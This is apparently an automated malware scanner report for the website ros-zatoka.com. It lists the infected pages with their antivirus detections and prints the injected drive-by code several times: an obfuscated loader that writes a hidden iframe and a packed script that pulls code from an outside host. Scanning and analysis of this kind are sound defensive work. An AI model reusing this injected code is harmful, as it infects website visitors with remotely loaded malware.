New scan:

Malware Scanner report for ros-zatoka.com

Malicious/Suspicious/Total urls checked
6/4/14
10 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ros-zatoka.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ros-zatoka.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.ros-zatoka.com/
200 OK
Content-Length: 19652
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e,
... 15681 bytes are skipped ...
200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape));

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://www.ros-zatoka.com/engine/classes/js/jquery.js
200 OK
Content-Length: 91556
Content-Type: application/x-javascript
clean
http://www.ros-zatoka.com/engine/classes/js/jqueryui.js
200 OK
Content-Length: 65247
Content-Type: application/x-javascript
clean
http://www.ros-zatoka.com/engine/classes/js/dle_js.js
200 OK
Content-Length: 19627
Content-Type: application/x-javascript
clean
http://www.ros-zatoka.com/kontakty/
200 OK
Content-Length: 20501
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e,
... 15681 bytes are skipped ...
200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape));

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://www.ros-zatoka.com/o-nas/
200 OK
Content-Length: 20126
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e,
... 15681 bytes are skipped ...
200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape));

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://www.ros-zatoka.com/nomera/
200 OK
Content-Length: 6750
Content-Type: text/html
suspicious
Suspicious code found

</span>

http://www.ros-zatoka.com/nomera-i-kategorii/
200 OK
Content-Length: 5244
Content-Type: text/html
suspicious
Suspicious code found

</span>

http://www.ros-zatoka.com/nomera-ii-kategorii/
200 OK
Content-Length: 5130
Content-Type: text/html
suspicious
Suspicious code found

</span>

http://www.ros-zatoka.com/bronirovanie/
200 OK
Content-Length: 5164
Content-Type: text/html
suspicious
Suspicious code found

</span>

http://www.ros-zatoka.com/uslugi/
200 OK
Content-Length: 20281
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e,
... 15681 bytes are skipped ...
200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape));

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://www.ros-zatoka.com/foto-galereja/
200 OK
Content-Length: 36354
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e,
... 15681 bytes are skipped ...
200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape));

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67

http://www.ros-zatoka.com/engine/classes/highslide/highslide.js
200 OK
Content-Length: 32986
Content-Type: application/x-javascript
clean
http://www.ros-zatoka.com/test404page.js
404 Not Found
Content-Length: 19028
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62'));

Decoded script:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e,
... 15681 bytes are skipped ...
200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape));

Antivirus reports:

Ad-Aware
Iframe.Malware.F4A42C67
Ikarus
Iframe
nProtect
Iframe.Malware.F4A42C67
Emsisoft
Iframe.Malware.F4A42C67 (B)
Comodo
UnclassifiedMalware
MicroWorld-eScan
Iframe.Malware.F4A42C67
F-Secure
Iframe.Malware.F4A42C67
GData
Iframe.Malware.F4A42C67
BitDefender
Iframe.Malware.F4A42C67


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ros-zatoka.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ros-zatoka.com
Referer: http://www.google.com/search?q=ros-zatoka.com

Result:
The result is similar to the first query. There are no suspicious redirects found.